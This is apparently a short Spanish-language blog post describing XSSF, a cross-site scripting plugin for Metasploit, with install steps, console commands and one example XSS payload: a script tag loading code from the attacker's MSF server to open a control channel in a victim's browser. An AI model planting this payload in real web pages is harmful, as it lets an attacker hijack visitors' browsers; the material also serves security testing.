Xssf Metasploit Plugin

12:37 0 Comments A+ a-


Descripción:

El Cross-Site Scripting Framework (XSSF) Es una herramienta para explotar esta vulnerabilidad
Es muy facil de usar. El XSSF permite crear un canal de comunicacion con el browser del target al que atacaremos.
Esta herramienta se puede integrar dentro del Framework de Metasploit y permite a los usuarios de MSF lanzarlos desde el browser.





Instalación:

1 - Descargar la ultima version de Metasploit
2 - Actualizar Ruby
3 - Abrir una terminal y navegar hasta el directorio [ /opt/metasploit/../msf3 ]
4 - Descargar XSSF usando el siguiente repositorio:
[ svn export http://xssf.googlecode.com/svn/trunk ./ --force ]


Instrucciones:

1 - Iniciar Metasploit Framework (MSF Console)
2 - Cargar el plugin XSSF usando el comando: 'load xssf'
3 - Se puede modificar el puerto con el siguiente comando: 'load xssf Port=80'
4 - Para cambiar la URL se utiliza el siguiente comando: 'load xssf Uri=/'
5 - Ejemplo del ataque: <script src=”http://IP-Server-MSF:Port/loop?interval=5”></script>


XSSF home:
[ https://code.google.com/p/xssf/ ]

Source Code:
[ https://code.google.com/p/xssf/source/browse/trunk/modules/?r=5#modules%2Fauxiliary%2Fxssf ]